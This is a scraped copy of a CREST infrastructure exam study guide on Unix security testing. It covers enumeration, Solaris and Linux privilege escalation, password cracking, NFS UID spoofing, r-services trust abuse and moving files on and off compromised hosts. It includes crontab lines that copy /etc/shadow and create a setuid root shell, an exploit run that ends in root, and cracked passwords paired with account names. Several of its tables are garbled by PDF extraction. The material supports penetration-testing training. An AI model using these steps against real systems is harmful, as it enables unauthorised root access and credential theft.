Add to collection(s) Add to saved
  1. No category
Uploaded by Raing1946

Unix Security Assessment: Crest Infrastructure Exam Prep

advertisement 
Crest:
Unix Security Assessment
By Ed Williams & Dave Cash
"Meistr pob gwaith yw
ymarfer."
Page 1 of 24
Introduction
Hi, this document is intended to give an overview of the practical Unix requirements for the crest
infrastructure exam. It is only intended to be an overview as there are some elements such as the
vulnerabilities, which will inevitably change over time. Good luck and don’t panic!
1
Core Technical Skills
1.1 B13 – File System Permissions
File permission attributes within Unix and their security implications.
Excess permissions
A nasty one – watch out for people issuing excessive permissions - always check cron to see if you can
write to or edit the crontab.
ls –ald /etc/cron*
If you do have write permissions to roots crontab, then adding an entry will effectively give you root. Either
copy the shadow file to /tmp, remembering to change permissions or give yourself a setuid shell – make
sure that the effective uid is 0.
Min
Hour
08
08
*
*
Day of
month
*
*
Month
*
*
Day of
Week
*
*
User
root
root
Command
cp /etc/shadow /tmp/shd; chmod 777 /tmp/shd
cp /bin/sh /tmp/sh; chmod 4777 /tmp/sh
SUID
The file permissions bits include an execute permission bit for file owner, group and other. When the
execute bit for the owner is set to "s" the set user ID bit is set. This causes any persons or processes that run
the file to have access to system resources as though they are the owner of the file. When the execute bit
for the group is set to "s", the set group ID bit is set and the user running the program is given access based
on access permission for the group the file belongs to. For example, the passwd binary requires this
privilege to alter the /etc/shadow file.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -al /usr/bin/passwd
-rwsr-xr-x 1 root root 37084 2009-04-04 06:49 /usr/bin/passwd
Save text attribute
If this is set, everyone can read, write, and access the directory. The "t'' indicates that only the user (and
root, of course) that created a file in this directory can delete that file. Typically, /tmp has the ‘sticky’ bit
set.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -ald /tmp
drwxrwxrwt 12 root root 4096 2009-12-11 08:50 /tmp
Note: a capital T means that the execute bit for other is not set, same for suid.
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: mkdir edward
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: sudo chmod 1000 edward
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: ls -ald !$
ls -ald edward
d--------T 2 ed ed 4096 2009-12-11 09:34 edward
Page 2 of 24
1.2 B14 – Audit Techniques
Listing process and their associated network sockets
This can be achieved using the lsof –i
– command
COMMAND
portmap
portmap
rpc.statd
rpc.statd
rpc.statd
sshd
shd
sshd
inetd
rwhod
rwhod
avahi-dae
dae
avahi-dae
dae
cupsd
cupsd
dhclient
PID
USER
2174 daemon
2174 daemon
2195 statd
2195 statd
2195 statd
2474
root
2474
root
2526
root
2544 rwhod
2552 rwhod
2835 avahi
2835 avahi
2859
root
2859
root
3096
root
FD
4u
5u
5r
7u
8u
3u
4u
4u
3u
3u
13u
14u
2u
3u
4w
TYPE DEVICE SIZE NODE NAME
IPv4
5160
UDP *:sunrpc
IPv4
5176
TCP *:sunrpc (LISTEN)
IPv4
5206
UDP *:675
IPv4
5214
UDP *:51362
IPv4
5217
TCP *:57831 (LISTEN)
IPv4
5721
TCP *:ssh (LISTEN)
IPv6
5723
TCP *:ssh (LISTEN)
IPv4
5795
UDP *:tftp
IPv4
5825
UDP *:who
IPv4
5825
UDP *:who
IPv4
6908
UDP *:mdns
IPv4
6909
UDP *:57840
IPv6
6958
TCP localhost:ipp (LISTEN)
IPv4
6959
TCP localhost:ipp (LISTEN)
IPv4
7434
UDP *:bootpc
Assessing patch levels
See F2
Finding Interesting files (find / grep)
Inevitably you’ll be required to find some interesting files. A good working knowledge of find and grep
should get you through – don’t forget you can use –xargs to further grep a found file.
Figure 1: find and xargs
Grep
Figure 2: grep
2
Unix Security Assessment
2.1 F1 – Username enumeration
rusers
rusers runs as an rpc service and can ne enumerated through the rpcinfo –p <ip> command.
100002
100002
100002
100002
2
3
2
3
udp
udp
tcp
tcp
32776
32776
32777
32777
rusersd
rusersd
rusersd
rusersd
To
o enumerate current logged in users issue
issue: rusers [–l] <ip>
Figure 3: rusers usage
rwho
rwho returns users currently logged onto the system.
513/udp open|filtered who
To
o enumerate current logged in users issue
issue: rwho [-a] <ip>
Typical output would look like the following
joe_user machine1:tty0p1 Sep 12 13:28 :11
fat_user machine1:tty1p2 Sep 12 13:59 :11
SMTP
The SMTP service runs on TCP port 25.
25/tcp
open
smtp
Sendmail 8.8.8+Sun/SMI-SVR4
8.8.8+Sun/SMI
The vrfy and expn SMTP verbs can be used to enumerate legitimate users from a system.
Figure 4: smtp username enumeration
finger
The finger daemon runs on TCP port 79.
79/tcp
open
finger
Sun Solaris fingerd
The finger daemon derives its information by doing an exact match on the user-name field in the
/etc/passwd file and a partial match in the GECOS field of the /etc/passwd file.
E.g.
finger admin@172.16.2.148
[172.16.2.148]
Login
Name
adm
Admin
lp
Line Printer Admin
uucp
uucp Admin
nuucp
uucp Admin
listen
Network Admin
samba
Samba Admin Call ext
ngadmin Northgate Admin Acco
GrayD02 LBB Admin Account
Lperrin Oracle Sys Admin
Rvernon Oracle Sys Admin
Jbryant Oracle Sys Admin
TTY
pts/21
pts/7
Idle
< .
< .
< .
< .
< .
< .
< .
<Mar
< .
<Apr
< .
When
Where
. . . >
. . . >
. . . >
. . . >
. . . >
. . . >
. . . >
21, 2006> 192.168.73.89
. . . >
3, 2006> 192.168.73.89
. . . >
Useful finger commands (don’t forget the –l switch for more information):
finger
finger
finger
finger
finger
admin@172.16.2.148
user@172.16.2.148
unix@172.16.2.148
dba@172.16.2.148
oracle@172.16.2.148
and with the –l switch, which gives .plan and .project information along with last login and shell etc.
finger –l dba@172.16.2.148
[172.16.2.148]
Login name: oracle
In real life: Oracle Account DBA Ext 1465
Directory: /home/oracle
Shell: /bin/sh
Last login Tue Apr 14, 2009 on pts/4 from lbb2k3s65.corp.
No unread mail
My Password is Cymru
Login name: oraprod
In real life: Oracle Account DBA Ext 1465
Directory: /home/oraprod
Shell: /bin/ksh
Last login Thu Apr 9, 2009 on pts/4 from lbb2ks39.corp.i
New mail received Mon Nov 9 06:57:14 2009;
unread since Sat May 26 06:00:18 2007
No Plan.
Page 5 of 24
2.2 F2 – Unix vulnerabilities
Solaris (Vulnerabilities)
Not many of these (http://www.0xdeadbeef.info/
http://www.0xdeadbeef.info/ ) – so get a compiled list for the sparc architecture –
and run exploit suggester (http://pentestmonkey.net/tools/exploit
http://pentestmonkey.net/tools/exploit-suggester/ ).
raptor_passwd (Solaris 8/9)
$gcc raptor_passwd.c -o
o passwd -ldl –Wall
$./passwd t3mpP4ss
raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
Using SI_PLATFORM : SUNW,UltraAX-i2
SUNW,UltraAX
(5.9)
Using stack base : 0xffbffffc
Using var address : 0xffbffb58
Using rwx_mem address : 0xff3f6004
Using sc address : 0xffbfff9c
Using ff address : 0xffbfff58
Using strcpy() address : 0xff3e0288
"Pai Mei taught you the five point palm exploding heart technique?" -- Bill
"Of course." -- Beatrix Kidd0,
dd0, alias Black Mamba, alias The Bride (KB Vol2)
# id;uname -a;uptime;
uid=0(root) gid=9610(gengrp) egid=3(sys)
SunOS swlbgdb 5.9 Generic sun4u sparc SUNW,UltraAX-i2
SUNW,UltraAX
4:43pm up 147 day(s), 11:01, 3 users, load average: 0.10, 0.11, 0.12
Linux (Vulnerabilities)
Loads of local privilege escalation exploits flying around for the Linux kernel 2.6,, the following is just an
example.
Figure 5: Linux 2.6. local exploit
Exfiltrate password hashes
Password hashes are, generally, stored in the /etc/shadow file. There are some exceptions to this, for
example, AIX stores its hashes in /etc/security/passwd.
Unix stores its passwords in a number of different formats.
DES – A series of 13 printable ASCII characters (the first two characters represent the salt itself). Maximum
password length is 8 characters. Not very good
root:xYnjRdy3g0lFw:14413::::::
MD5 - The printable form of MD5 password hashes starts with $1$. Better than DES.
yanine:$1$lfLyLkaB$TDF882DQF2ip87INNA1Uhi:14280:0:99999:7:::
SHA - The printable form of these hashes starts with $5$ or $6$ depending on which SHA variant is used.
Best yet.
root:$6$rP1wFKQN$Un1fLI3fLKgw7qESqwMOs3DhPW1bdq2JdrRCLGUxF8r8xeqQXcj.bKVllrbkSmyNSlesNJOTYLOinn
pe4FypZ.:14574:0:99999:7:::
Crack password hashes
John the ripper can be used to crack Unix based hashes (http://www.openwall.com/john/ ).
Firstly, you’ll need to combine both the /etc/passwd and /etc/shadow files so that they can be cracked.
This can be achieved with
$unshadow pwd shd > run
Once you have the one file, it can be as simple as running
$john run
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed: john run
Loaded 31 password hashes with 31 different salts (Traditional DES [64/64 BS MMX])
lbbts107
(lbbts107)
sx3dev
(sx3dev)
feawards
(feawards)
lcs1
(lcs)
fujitsu
(fujitsu)
esd1
(esd)
orats
(orats734)
appco107
(appco107)
thursday
(ftpusr)
letmein1
(cfmjd)
tango1
(fppgen)
spock1
(cfm)
Furthermore, john does have a lot of useful options.
john --users=root file – will attempt to crack only the root user
john --wordlists=words file – will use a dictionary type attack
/etc/john/john.conf should be edited to change min and max length values.
Do a,
vi +333 /etc/john/john.conf to get you to the correct place.
A man john will give you a full list of options, which should be read.
Page 7 of 24
Check patch levels
Linux – rpm –qa
Debian based Linux – dpkg --list
Solaris – pkginfo –x
Derive list of missing security patches
For the solaris patches, you will need the output of three files:
uname –a
pkginfo –x
showrev -p
Make sure you have a copy of patch check analyser - http://www.par.univie.ac.at/solaris/pca/
Running
./pca.pl –f . –l missings
will produce a list of missing patches, the following is an example. Note the ‘.’ Represents the current
directory so ensure that the three files are in the same directory.
Using /var/tmp/patchdiag.xref from Oct/29/09
Host: lbbuxfis (SunOS 5.10/Generic_118822-26/sparc/sun4u)
List: missings (116/47350)
Patch
-----120900
121133
119254
116298
Patch
118666
118667
118777
118918
138217
IR
---10
08
<
<
<
<
CR
-04
02
70
21
RSB
--R-R-RS-S-
------
<
<
<
<
<
23
23
14
24
01
RS- 59 JavaSE 5.0:
RS- 59 JavaSE 5.0:
RS- 150 SunOS 5.10:
RS- 999 SunOS 5.10:
R-- 357 SunOS 5.10:
Page 8 of 24
Age
--999
999
67
999
Synopsis
------------------------------------------------------SunOS 5.10: libzonecfg Patch
SunOS 5.10: zones library and zones utility patch
SunOS 5.10: Install and Patch Utilities Patch
Sun One Application Server 7.0: Java API for XML Parsing 1.2
update 21 patch (equivalent to JDK 5.0u21)
update 21 patch (equivalent to JDK 5.0u21), 64bit
Sun GigaSwift Ethernet 1.0 driver patch
Solaris Crypto Framework patch
svccfg & svcprop patch
2.3 F3 – FTP
FTP traffic in general including the authentication process, is passed over the network in clear text. As a
result, a suitably placed attacker could sniff credentials.
Figure 6: FTP clear text
In addition, some FTP servers may be configured to allow anonymous access to a restricted file set, or
indeed the entire file system.
An FTP server can be connected to as per the screenshot below. Notice the user anonymous is used with
a password of a@a.com,, although any valid email string could be used. When using the ‘get’ command
to retrieve files from the server, the file is always placed in the current working directory of the attacking
machine, which can be found by issuing the ‘lcd’ command whilst within the FTP session.
Figure 7: FTP Anonymous connection
Using this method, sensitive files may be downloaded from the host.
Figure 8: Secret file
2.4 F4 – Sendmail / SMTP
Valid username discovery via EXPN and VRFY
see username enumeration – SMTP
Sendmail Vulnerabilities
In the past, Sendmail has had loads of associated vulnerabilities so check vulnerability databases.
Mail Relaying
If an SMTP server allows internal relaying, a malicious user can use the SMTP server to send emails between
two accounts within the same domain.
This is especially useful for social engineering attacks as mails can easily be forged and are not as
traceable as they may be otherwise. It may be that the
the SMTP server is allowing a mail to be composed but
being silently dropped. While this prevents the actual mail from being sent, log files may increase due to
unsuccessful spammer attempts.
Figure 9 – SMTP mail relay
2.5 F5 – NFS
NFE Security – host level and file level
/etc/export is the file where all the magic happens.
Root squashing, nosuid and noexec options
/data/foxwood 192.168.100.0/24(rw,root_squash,nosuid,noexec)
root_squash - Convert incoming requests from user root to
to the anonymous uid and gid (default).
nosuid – does not allow set-user-identifier
identifier and/or set-group-identifier
set
identifier bits to take effect.
noexec – does not permit execution of binaries.
Files access through UID and GID manipulation
Altering the uid of the user
er you are currently mounted will allow you to access the files
files. For example:
The first step is to check if the nfs / mountd services are running through the rpcinfo command. As there
are, check the available shares on that host through the showmount command:
Figure 10 – RPC Enumeration / available shares
From here, you’ll need to create a directory to act as your mount point. Following that, issue the mount
command and browse to the mount point.
Figure 11 – Mounting share
As you can see,, the ‘ed’ user attempts to redirect a + + into the .rhosts file,
file, which you can see with the
permissions rw-r—r—.
Figure 12 – Attempting to right to a file
The next step is to create a new user with the same uid (1337). This is achieved with the following
command:
adduser --uid 1337 stest
Next,
su – stest
Change directory back to the mount point and you should now have access to the previously un
unreadable files.
Figure 13 – Gaining Access
2.6 F6 – R* Services
Berkley remote services, commonly known as the r-services
r
(not shown is rusers, rwho and rcp)
rcp).
512/tcp
513/tcp
514/tcp
open
open
open
exec
login
shell
Access control (/etc/hosts.equiv and .rhosts)
/etc/hosts.equiv
This is a system level file that defines trusted hostnames or IP addresses that can freely access rr-services
and works in a similar way to .rhosts the main difference is that you cannot authenticate / connect as the
root user through this file.
.rhosts
This is a user based file and exists in $HOME,
$HOME its use can allow un-authenticated
authenticated access across different
hosts. It generally has the format hostname
name user; however, a + + would allow a connection from any host
as any user (including root).
When a user connects to the host running rshd the source IP address is cross referenced against the .rhosts
file and the username is verified by querying the identd service running at the source.
Trust Relationships
As mentioned above.
Impact of poorly configured trust relationships
If a system becomes compromised, then a quick find for an .rhosts file could allow unauthenticated
access to other, sensitive, hosts.
2.7 F7 – X11
X servers list on TCP port 6000 to 6063 (depending on the number of concurrent displays)
displays).
Interesting ports on 172.16.2.148:
6000/tcp open
X11
6001/tcp open
X11:1
6003/tcp open
X11:3
6005/tcp open
X11:5
Grabbing screens
If host based security, with an xhost + has been issued, then it is possible to remotely ‘grab’ the current
screen, with the following
xwd –root –display
display <ip>:0 | xwud or use x-dumper.sh
As you can see, from a Linux terminal a solaris screen has been ‘grabbed’.
Figure 14: Screen grabbing through X11
The two authentication mechanisms within X windows are xhost and xauth, which are discussed below.
Host Based Security
Host based X authentication allows users to specify which IP address and hosts have access to the xserver. The xhost command is used with a + and – options to allow and deny X access from individual
hosts (i.e. xhost +192.168.226.200). If the + option is used with no address, any remote host can access
the X server.
User Based Security
When a legitimate user logs in locally to X windows, a magic cookie is placed into the .Xauthority file
under $HOME. The .Xauthority file contains one cookie for each X display the user can use; this can be
manipulated using the xauth utility.
Both host based security and user based security are utilised over unencrypted protocols and should / can
be pushed through ssh.
Page 16 of 24
2.8 F8 – RPC services
RPC Service Enumeration
This can be achieved a number of ways, if the portmapper service is running (TCP/UDP 111) and run:
rpcinfo –p <ip>
The following is an example from a default solaris 10 installation.
program vers proto
100000
100000
100000
100000
100000
100000
100232
100083
100221
100068
100068
100068
100068
100229
100229
100230
100242
100422
100011
100001
100001
100001
100002
100002
100002
100002
100008
100012
100153
100021
100021
100021
4
3
2
4
3
2
10
1
1
2
3
4
5
1
2
1
1
1
1
2
3
4
2
3
2
3
1
1
1
1
2
3
Page 17 of 24
tcp
tcp
tcp
udp
udp
udp
udp
tcp
tcp
udp
udp
udp
udp
tcp
tcp
tcp
tcp
tcp
udp
udp
udp
udp
udp
udp
tcp
tcp
udp
udp
udp
udp
udp
udp
port
111
111
111
111
111
111
32772
32771
32772
32773
32773
32773
32773
32773
32773
32774
32775
32776
32774
32775
32775
32775
32776
32776
32777
32777
32777
32778
32779
4045
4045
4045
program vers proto
portmapper
portmapper
portmapper
portmapper
portmapper
portmapper
rquotad
rstatd
rstatd
rstatd
rusersd
rusersd
rusersd
rusersd
walld
sprayd
nlockmgr
nlockmgr
nlockmgr
100021
4
100021
100021
100021
100021
100024
100024
100133
100133
300598
300598
100249
100249
805306368
805306368
100005
100005
100005
100005
100005
100005
100003
100003
100227
100227
100003
100003
100227
100227
udp
1
2
3
4
1
1
1
1
1
1
1
1
1
1
1
2
3
1
2
3
2
3
2
3
2
3
2
3
port
4045 nlockmgr
tcp
4045 nlockmgr
tcp
4045 nlockmgr
tcp
4045 nlockmgr
tcp
4045 nlockmgr
udp 32788 status
tcp 32778 status
udp 32788
tcp 32778
udp 32856
tcp 32823
udp 32857
tcp 32824
udp 32856
tcp 32823
udp 58102 mountd
udp 58102 mountd
udp 58102 mountd
tcp 39586 mountd
tcp 39586 mountd
tcp 39586 mountd
udp
2049 nfs
udp
2049 nfs
udp
2049
udp
2049
tcp
2049 nfs
tcp
2049 nfs
tcp
2049
tcp
2049
Good ol’ nmap can take care of this too:
nmap –sR <ip> – can also be used to enumerate rpc services.
C:\Documents and Settings\Ed Williams>nmap -sR
Interesting ports on 192.168.226.200:
Not shown: 976 closed ports
PORT
STATE SERVICE
21/tcp
open ftp
22/tcp
open ssh
23/tcp
open telnet
79/tcp
open finger
111/tcp
open rpcbind (rpcbind V2-4)
513/tcp
open login
514/tcp
open shell
4045/tcp open nlockmgr (nlockmgr V1-4)
6000/tcp open X11
6112/tcp open dtspc
6788/tcp open unknown
6789/tcp open ibm-db2-admin
7100/tcp open font-service
32771/tcp open status (status V1)
32772/tcp open fmproduct (fmproduct V1)
32773/tcp open dmispd (dmispd V1)
32774/tcp open snmpXdmid (snmpXdmid V1)
32777/tcp open metad (metad V1-2)
32778/tcp open ttdbserverd (ttdbserverd V1)
32779/tcp open mdcommd (mdcommd V1)
32780/tcp open rpc.metamedd (rpc.metamedd V1)
32781/tcp open metamhd (metamhd V1)
32782/tcp open rusersd (rusersd V2-3)
32783/tcp open unknown
MAC Address: 00:0C:29:74:7D:D5 (VMware)
192.168.226.200
VERSION
2-4 (rpc #100000)
1-4 (rpc #100021)
1 (rpc #100024)
1 (rpc #1073741824)
1 (rpc #300598)
1 (rpc #100249)
1-2 (rpc #100229)
1 (rpc #100083)
1 (rpc #100422)
1 (rpc #100242)
1 (rpc #100230)
2-3 (rpc #100002)
Nmap done: 1 IP address (1 host up) scanned in 36.39 seconds
Common RPC Services
Portmapper (needed)
nfs / mountd
rusers
yp*
sadmind
statd
CDE Calendar Manager Service Daemon (CMSD)
Page 18 of 24
Recent or commonly found RPC service vulnerabilities
Sadmind bad boy is probably the most famous
famous;; however, there are a few more dotted around.
Figure 15: Exploiting sadmind
Its worth noting here that both canvas and metasploit have this vulnerability within their frameworks.
Figure 16: Metasploit sadmind
2.9 F9 – SSH
Identify the types and versions of ssh software in use
C:\Documents and Settings\Ed
Ed Williams>nc
Williams>
-vn 192.168.226.219 22
(UNKNOWN) [192.168.226.219] 22 (?) open
SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
5ubuntu1
This banner should be removed.
C:\Documents and Settings\Ed
Ed Williams>nc -vn 192.168.226.222 22
(UNKNOWN) [192.168.226.222] 22 (?) open
SSH-2.0-OpenSSH_
This can be achieved by editing the sshd binary with a hex editor (hexedit or vi) and searching and
removing the text.
Figure 17: Hexedit sshd
Securing ssh
By default, ssh has the
e password authenticate enabled,
enabled this should be removed as this can be brute
forced (although very slowly),, this can be configured in the /etc/sshd_config file:
Figure 18: ssh brute force
# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords yes
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes
The config file has a number of configurable security options; such as allow and deny hosts, listening port
number; make sure that root cannot directly authenticate – better to log in as a standard user and su to
root.
# Authentication:
LoginGraceTime 120
PermitRootLogin no
StrictModes yes
Also better to generate a set of keys using ssh-keygen, will need to add the public key into the authorized
key file of the remote host. Enforcing use of the from="" and command="" strings in the authorized keys file.
Ensure new keys have been generated for all hosts, with a minimum key length of at least 4096 bits.
Versions 1 and 2 of the ssh protocol
Since SSH-1 has inherent design flaws which make it vulnerable (e.g., man-in-the-middle attacks), it is now
generally considered obsolete and should be avoided by explicitly disabling fallback to SSH-1. While most
modern servers and clients support SSH-2, some organizations still use software with no support for SSH-2,
and thus SSH-1 cannot always be avoided.
In all versions of SSH, it is important to verify unknown public keys before accepting them as valid.
Accepting an attacker's public key as a valid public key has the effect of disclosing the transmitted
password and allowing man-in-the-middle attacks.
Authentication mechanisms within ssh
Quite a few here – from passwords to key-pairs to certificates. Mentioned above.
Page 21 of 24
2.10 Moving files on and off the compromised host
Once a host has been compromised,, there will be a need to move files to and from the compromised
host. This can be achieved by using either of the following.
TFTP
Trivial File Transfer Protocol (TFTP) is a file transfer protocol,, with the functionality of a very basic form of File
Transfer Protocol (FTP).
You’ll need the TFTP client installed on the compromised host and a TFTP server on your host. The
solarwinds software set has an TFTP server. The following is an example of its usage:
Dydd_Gwener-11-Mis_Rhagfyr:/home/ed:
Mis_Rhagfyr:/home/ed: tftp 192.168.226.1
tftp> put f
Sent 325 bytes in 0.0 seconds
tftp>
The file f will be placed in the tftp root directory on 192.168.226.1.
SCP
Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host
or between two remote hosts. It is based on the Secure Shell (SSH) protocol. If the ssh service is being
presented and providing you have valid credentials for the host then you will be able to move files to and
from the host.
Typically, the syntax of scp program is like the syntax of cp:
Copying file to compromised host:
scp SourceFile user@host:directory/TargetFile
Figure 19: scp’ing a file
Will copy the proto_ops.tgz file to the /tmp directory on 192.168.1.65 using jordan’s credentials
credentials, which
have been enumerated using X11.
The inverse of this is also possible; i.e. copying
opying a file from the compromised host:
scp user@host:directory/SourceFile TargetFile
Unix Tips
Once on the compromised host – do most of your work on /tmp
Once you have escalated privileges, copy /etc/shadow and /etc/passwd to /tmp – remembering to
change permissions on the two files so you can scp and crack with john on your box.
Create a directory on your host and work from there.
I find it easier to scp from my host and dump everything in the /tmp directory of the compromised host.
Page 23 of 24
Useful References
Related documents
SI110 Spring AY13 Alpha:___________ Name:________________________________
SI110 Spring AY13 Alpha:___________ Name:________________________________
Computer Networking Homework: Routing, TCP, UDP, DNS
Computer Networking Homework: Routing, TCP, UDP, DNS
Q13 Why do manufacturers of network hardware and software follow
Q13 Why do manufacturers of network hardware and software follow
Networked Car Race Game Presentation - CSE 704
Networked Car Race Game Presentation - CSE 704
Download
advertisement